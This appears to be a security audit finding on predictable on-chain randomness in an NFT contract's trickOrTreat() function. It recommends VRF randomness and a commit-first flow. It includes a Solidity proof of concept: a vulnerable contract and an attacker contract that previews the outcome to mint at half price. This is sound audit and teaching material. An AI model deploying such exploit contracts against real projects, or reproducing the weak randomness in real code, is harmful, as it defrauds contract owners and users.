The contract derives a random value from on-chain information that a caller can predict, and in part influence, before the value is used.
The code on lines 56-57 generates a random value from a set of on-chain data. This method is known to be unsafe: every input is readable by the caller in the same transaction (and some of them, such as the calling address, are chosen by the caller), so a user can compute the random value before executing function trickOrTreat() and only submit the call when the result is favourable to the user.
This means that the user's chance of getting a treat (an NFT for half the price) is much higher than the intended 1/1000. By computing the outcome first and calling only when it is favourable, a user can mint an NFT for half the price with near certainty, paying only gas for the attempts that are skipped.
Manual review.
Consider using a more secure random generator method, for example by requesting randomness from a VRF provider, and commit the user to the purchase before the random value is known so that the outcome cannot be previewed and abandoned.
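As an added example (not the audited project's code, and not what lines 56-57 actually contain), the following Solidity reconstructs the pattern described in this finding with an assumed formula of block.timestamp, block.prevrandao and msg.sender, plus a caller contract that precomputes the same value and only goes through with the call when a treat is guaranteed. The contract names, the 1 ether price and the 1/1000 threshold are assumptions for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the audited project's code. The randomness formula is an
// ASSUMED pattern typical of "on-chain randomness"; the real lines 56-57 may differ.
contract TrickOrTreatVulnerable {
    uint256 public constant PRICE = 1 ether;   // assumed full price
    uint256 public nextId;
    mapping(uint256 => address) public ownerOf;

    // Every input here is known to the caller before the transaction is sent
    // (block fields are identical for all calls in the same block, and msg.sender
    // is the caller's own address), so the "random" value is fully predictable.
    function _random() internal view returns (uint256) {
        return uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao, msg.sender)));
    }

    // Assumed rule: 1/1000 chance of a "treat" (mint for half price), else full price.
    function trickOrTreat() external payable {
        uint256 cost = (_random() % 1000 == 0) ? PRICE / 2 : PRICE;
        require(msg.value >= cost, "insufficient payment");
        ownerOf[nextId++] = msg.sender;
    }
}

// Caller contract that previews the outcome. Inside one transaction the block
// fields are fixed and the target sees msg.sender == address(this), so the value
// computed here equals the one the target will compute. If it is not a treat,
// revert: nothing is paid but gas, and the attempt is simply repeated in a later
// block until the check passes. The conditional chance of half price becomes 1.
contract TreatSniper {
    TrickOrTreatVulnerable public immutable target;

    constructor(TrickOrTreatVulnerable t) {
        target = t;
    }

    function snipe() external payable {
        uint256 r = uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao, address(this))));
        require(r % 1000 == 0, "not a treat block, retry later");
        target.trickOrTreat{value: target.PRICE() / 2}();
    }

    receive() external payable {}
}
```

The fix recommended above changes the shape of the flow rather than just the formula: the purchase is recorded (and paid for) in a first transaction that requests randomness from the VRF coordinator, and the treat/trick decision is made in the provider's fulfilment callback, so by the time the random word is known the user can no longer choose whether to participate. Swapping block.prevrandao for another on-chain value does not help, because the caller can still read it before calling.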
It's written in the README: "We're aware of the pseudorandom nature of the current implementation. This will be replaced with Chainlink VRF in later builds." This is a known issue.